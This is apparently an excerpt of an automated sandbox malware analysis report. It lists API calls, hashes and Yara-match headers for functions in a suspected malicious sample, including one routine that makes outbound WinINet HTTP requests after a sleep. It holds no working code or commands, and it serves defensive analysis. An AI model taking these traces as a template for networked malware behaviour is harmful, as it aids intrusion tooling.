                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$ContextVirtual$Processor::QuickScheduler$ClearCountedEventIdleInterlockedProcessorReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSlotSpinTasksThrowTraceUntilVisible
                    • String ID:
                    • API String ID: 3608406545-0
                    • Opcode ID: a39cb41113445c8b37c8e93bd00c54bcce78915a73e61bcd78f9524f0075e564
                    • Instruction ID: ce8ee4f4b9e79537c6bbc33651b740316f009e216806ba6279d344ff4923edf8
                    • Opcode Fuzzy Hash: a39cb41113445c8b37c8e93bd00c54bcce78915a73e61bcd78f9524f0075e564
                    • Instruction Fuzzy Hash: 56518D787402049FDB04EF24C4A5BAD77A6BF49311F1941B9ED0A9B286CB71AD05CFA2
                    APIs
                    • Sleep.KERNEL32(000005DC), ref: 0040BEB8
                    • InternetOpenW.WININET(00458DC8,00000000,00000000,00000000,00000000), ref: 0040BEC7
                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040BEEB
                    • HttpOpenRequestA.WININET(?,00000000), ref: 0040BF35
                    • HttpSendRequestA.WININET(?,00000000), ref: 0040BFF5
                    • InternetReadFile.WININET(?,?,000003FF,?), ref: 0040C0A7
                    • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 0040C160
                    • InternetCloseHandle.WININET(?), ref: 0040C187
                    • InternetCloseHandle.WININET(?), ref: 0040C18F
                    • InternetCloseHandle.WININET(?), ref: 0040C197
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                    • String ID:
                    • API String ID: 1439999335-0
                    • Opcode ID: f215b8e2ea09d3ecaada130b4dc6c3e3702a4eea93e94d9dbc2753dde293878e
                    • Instruction ID: 71497d68164bda9dcaa66ce95f0c59154e79fc335b3d255b1b18961781db6419
                    • Opcode Fuzzy Hash: f215b8e2ea09d3ecaada130b4dc6c3e3702a4eea93e94d9dbc2753dde293878e
                    • Instruction Fuzzy Hash: 50D1D5B0A10118DBDB24DF28CD88B9D7B75EF45304F5082AAF909A72D2D7399AC4CF59
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00426A1F
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426A51
                    • List.LIBCONCRT ref: 00426A8C
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426A9D
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426AB9
                    • List.LIBCONCRT ref: 00426AF4
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426B05
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426B20
                    • List.LIBCONCRT ref: 00426B5B
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426B68
                      • Part of subcall function 00425EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425EF7
                      • Part of subcall function 00425EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00425F09
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 3403738998-0
                    • Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction ID: 579499c82c18d5a5ade90e723c63f8c40f3c28f02b2f1580fedc01109288aa91
                    • Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction Fuzzy Hash: 9C516170B00229ABDB04DF65D495BEEB7A8FF08304F45406EE915EB381DB78AE45CB94
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 021A6C86
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 021A6CB8
                    • List.LIBCONCRT ref: 021A6CF3
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 021A6D04
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 021A6D20
                    • List.LIBCONCRT ref: 021A6D5B
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 021A6D6C
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 021A6D87
                    • List.LIBCONCRT ref: 021A6DC2
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021A6DCF
                      • Part of subcall function 021A6146: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 021A615E
                      • Part of subcall function 021A6146: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 021A6170
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 3403738998-0
                    • Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction ID: b6cf1d9fa0e13a915aa195fe687ce662d34f642fe31c5a3e85fe77d3f6b0fbe1
                    • Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction Fuzzy Hash: 1C515FB9A40219AFDF18DF65C5A4BEDB3B9FF08344F484069D955AB281DB30AE44CF90
                    APIs
                    • _free.LIBCMT ref: 0043A56F
                      • Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
                      • Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D
                    • _free.LIBCMT ref: 0043A57B
                    • _free.LIBCMT ref: 0043A586
                    • _free.LIBCMT ref: 0043A591
                    • _free.LIBCMT ref: 0043A59C
                    • _free.LIBCMT ref: 0043A5A7
                    • _free.LIBCMT ref: 0043A5B2
                    • _free.LIBCMT ref: 0043A5BD
                    • _free.LIBCMT ref: 0043A5C8
                    • _free.LIBCMT ref: 0043A5D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
                    • Instruction ID: d5756e4be776d265c631e914caca5967b4e144ec79bf9f4ded6797d03f0bc009
                    • Opcode Fuzzy Hash: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
                    • Instruction Fuzzy Hash: C021E776940108FFCB01EFA9C881CDE7BBABF08345F0051AAF5459B521EB35EA94CB85
                    APIs
                    • _free.LIBCMT ref: 021BA7D6
                      • Part of subcall function 021BB05C: HeapFree.KERNEL32(00000000,00000000,?,021BF334,?,00000000,?,?,?,021BF35B,?,00000007,?,?,021BF75D,?), ref: 021BB072
                      • Part of subcall function 021BB05C: GetLastError.KERNEL32(?,?,021BF334,?,00000000,?,?,?,021BF35B,?,00000007,?,?,021BF75D,?,?), ref: 021BB084
                    • _free.LIBCMT ref: 021BA7E2
                    • _free.LIBCMT ref: 021BA7ED
                    • _free.LIBCMT ref: 021BA7F8
                    • _free.LIBCMT ref: 021BA803
                    • _free.LIBCMT ref: 021BA80E
                    • _free.LIBCMT ref: 021BA819
                    • _free.LIBCMT ref: 021BA824
                    • _free.LIBCMT ref: 021BA82F
                    • _free.LIBCMT ref: 021BA83D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
                    • Instruction ID: 7f69f1d0a80cacef4828afa744ff7acc80e1f28342b3ac3c8e5cced3a1f9533b
                    • Opcode Fuzzy Hash: 1702a0a1dc840abddd1c64ba95121113f610cdca08529299edb68c6a0e13c010
                    • Instruction Fuzzy Hash: AC216B76944108EFCB52EF94C880DDD7BB9BF08344F014565EA299B921DB72DB54CF84
                    APIs
                    • RtlDecodePointer.NTDLL(?), ref: 00445A9B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: 7e11b681a690fd98a2b640cdef5f2481af1cc968e8b139b6733d987c9b93043a
                    • Instruction ID: 8f21642526c0a384525b0a78e457c39df1912065d7a9ddf966662cad22d26739
                    • Opcode Fuzzy Hash: 7e11b681a690fd98a2b640cdef5f2481af1cc968e8b139b6733d987c9b93043a
                    • Instruction Fuzzy Hash: EE517E74904E4ADBEF109F58E88C5AE7F74FB05310F148157D880AA356CB789A2ACF1D
                    APIs
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004273B0
                    • SwitchToThread.KERNEL32(?), ref: 004273D3
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004273F2
                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0042740E
                    • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00427419
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00427440
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
                    • String ID: count$ppVirtualProcessorRoots
                    • API String ID: 3791123369-3650809737
                    • Opcode ID: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
                    • Instruction ID: 910b0151320ec7fd7557316ad521234f334c06ab70371bbe18cdfb5d61862d5e
                    • Opcode Fuzzy Hash: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
                    • Instruction Fuzzy Hash: A8219334B00229EFCB10EF55D485AAEBBB5BF09344F54406AEC0197351CB38AE05CB98
                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 00426E36
                    • GetCurrentProcess.KERNEL32 ref: 00426E3E
                    • DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 00426E53
                    • SafeRWList.LIBCONCRT ref: 00426E73
                      • Part of subcall function 00424E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00424E7F
                      • Part of subcall function 00424E6E: List.LIBCMT ref: 00424E89
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00426E85
                    • GetLastError.KERNEL32 ref: 00426E94
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00426EAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                    • String ID: eventObject
                    • API String ID: 165577817-1680012138
                    • Opcode ID: b62cbed1bd16eb0b2b2c40c5403938e97f3cad696c6ba2539ab88a788b3ccb2b
                    • Instruction ID: 2eb99b2fab9b0e49766b11680856393b7410886275509e22dbc04e0cf8104fc6
                    • Opcode Fuzzy Hash: b62cbed1bd16eb0b2b2c40c5403938e97f3cad696c6ba2539ab88a788b3ccb2b
                    • Instruction Fuzzy Hash: 5D11E379600214EBDB14EBA4EC8AFEE3768AF04306F61416AF505A61D2DB389A04C66D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
                    • Instruction ID: ee9b374b754267b3a96934832a8bfcd590faa4b6eb17edeb4b1fb680e658e9fc
                    • Opcode Fuzzy Hash: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
                    • Instruction Fuzzy Hash: A3C114B0A04649EFEF15DF99C880BAEBBB1AF49314F00416BE441A7393D7789901CF69
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
                    • Instruction ID: 5cd523f7bc6e34e3acc98a8ccc38ca0d205e2ca02df0f6c2d2a0058d2c3ed8ee
                    • Opcode Fuzzy Hash: f581972419559139547d94a09d48a4cf01951f6f19e23db2bc11059fe6a6d649
                    • Instruction Fuzzy Hash: A7C103B8E84249AFDF15CF98D880BADBBB7AF59300F61406CE415BB281D770A941CF65
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                    • String ID:
                    • API String ID: 3943753294-0
                    • Opcode ID: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
                    • Instruction ID: 0054ac8abae0651131a5fa465e98ad130ee9acc88b3ba150755ff34fdca2a131
                    • Opcode Fuzzy Hash: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
                    • Instruction Fuzzy Hash: 69516B35940206CFCF18DF24D9849A9B7B1FF0C315B2444AAE8869B262DB31E981CFA5
                    APIs
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427903
                      • Part of subcall function 00425CB8: __EH_prolog3_catch.LIBCMT ref: 00425CBF
                      • Part of subcall function 00425CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00425CF8
                    • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 00427911
                      • Part of subcall function 0042691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00426942
                      • Part of subcall function 0042691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00426965
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0042792A
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427936
                      • Part of subcall function 00425CB8: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00425D41
                      • Part of subcall function 00425CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00425D70
                      • Part of subcall function 00425CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00425D7E
                    • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00427982
                    • Concurrency::location::_Assign.LIBCMT ref: 004279A3
                    • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 004279AB
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 004279BD
                    • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 004279ED
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                    • String ID:
                    • API String ID: 2678502038-0
                    • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                    • Instruction ID: be26d28973ab40e19276e1e39a9ed43843e9869f42fe47dc141d3d43563d5587
                    • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                    • Instruction Fuzzy Hash: 9F314670B083715AEF16AA7854927FF77B59F01304F4401ABD485D7342DA2C4D8AC3D9
                    APIs
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 021A7B6A
                      • Part of subcall function 021A5F1F: __EH_prolog3_catch.LIBCMT ref: 021A5F26
                      • Part of subcall function 021A5F1F: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 021A5F5F
                    • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 021A7B78
                      • Part of subcall function 021A6B84: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 021A6BA9
                      • Part of subcall function 021A6B84: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 021A6BCC
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 021A7B91
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 021A7B9D
                      • Part of subcall function 021A5F1F: RtlInterlockedPopEntrySList.NTDLL(?), ref: 021A5FA8
                      • Part of subcall function 021A5F1F: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 021A5FD7
                      • Part of subcall function 021A5F1F: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 021A5FE5
                    • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 021A7BE9
                    • Concurrency::location::_Assign.LIBCMT ref: 021A7C0A
                    • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 021A7C12
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 021A7C24
                    • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 021A7C54
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                    • String ID:
                    • API String ID: 2678502038-0
                    • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                    • Instruction ID: 99076a64ce9ee21b7618bf656e910cd6d95a771807e6e9e4d3cb11b0da2e77b9
                    • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                    • Instruction Fuzzy Hash: 8B310638B8025A6FDF26AA7844A17FEF7B65F45304F0400A9C855E7285DB254A47CBE1
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 0043099B
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425CAE,?), ref: 004309AD
                    • GetCurrentThread.KERNEL32 ref: 004309B5
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425CAE,?), ref: 004309BD
                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,00425CAE,?), ref: 004309D6
                    • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 004309F7
                      • Part of subcall function 00420211: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 0042022B
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00425CAE,?), ref: 00430A09
                    • GetLastError.KERNEL32(?,?,?,?,?,00425CAE,?), ref: 00430A34
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00430A4A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
                    • String ID:
                    • API String ID: 1293880212-0
                    • Opcode ID: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
                    • Instruction ID: 58a410a88ddb3f2405c1133c244b860286e3bd8ce2c4f5659541a2373579a810
                    • Opcode Fuzzy Hash: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
                    • Instruction Fuzzy Hash: 07112779600301ABD700AFB1BD5AF9B3BA89F19701F14017AF945D6253EA78D800873A
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 021B0C02
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,021A5F15,?), ref: 021B0C14
                    • GetCurrentThread.KERNEL32 ref: 021B0C1C
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,021A5F15,?), ref: 021B0C24
                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,021A5F15,?), ref: 021B0C3D
                    • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 021B0C5E
                      • Part of subcall function 021A0478: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 021A0492
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,021A5F15,?), ref: 021B0C70
                    • GetLastError.KERNEL32(?,?,?,?,?,021A5F15,?), ref: 021B0C9B
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021B0CB1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
                    • String ID:
                    • API String ID: 1293880212-0
                    • Opcode ID: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
                    • Instruction ID: 69079787b73699cf44f1f6903bda402ee50cab19408750c719efde125c107b13
                    • Opcode Fuzzy Hash: ca3b420515bcbb23f0314330c0ebaf985fd69accfaa50322e501786fcfee08c6
                    • Instruction Fuzzy Hash: 1211E1B9680305AFD711AB749D5DFDB3BB8AF09702F0800B5F946DA152EB74C9048B76
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: XgE$XgE
                    • API String ID: 597776487-1765908331
                    • Opcode ID: 1b696d6c4c17f14bd2cd532e520e2bf73148f9a8717794c16fbf28e545bba7b4
                    • Instruction ID: 711db5bb242ea00d46f0d8f357ac5cdbfb32cc55bf6326f590d519c5e58ffbab
                    • Opcode Fuzzy Hash: 1b696d6c4c17f14bd2cd532e520e2bf73148f9a8717794c16fbf28e545bba7b4
                    • Instruction Fuzzy Hash: 84C12779A84255AFDB25AF78CC50BEE7BFAAF65314F3400ADDC9097290E7708A41CB50
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d2c1a298e8fecfe48cef90fb9b18945fd86a062cf10d1e3a8c03b853429e7ba7
                    • Instruction ID: b6c963ef504d0b92181aee1796deacc62c0cd07897d9197554932035a5c69692
                    • Opcode Fuzzy Hash: d2c1a298e8fecfe48cef90fb9b18945fd86a062cf10d1e3a8c03b853429e7ba7
                    • Instruction Fuzzy Hash: BBF1E17094025CAFEB24DF64CC84BDEBBBAEF44304F5042A9E519A72C1DB749A84CF95
                    APIs
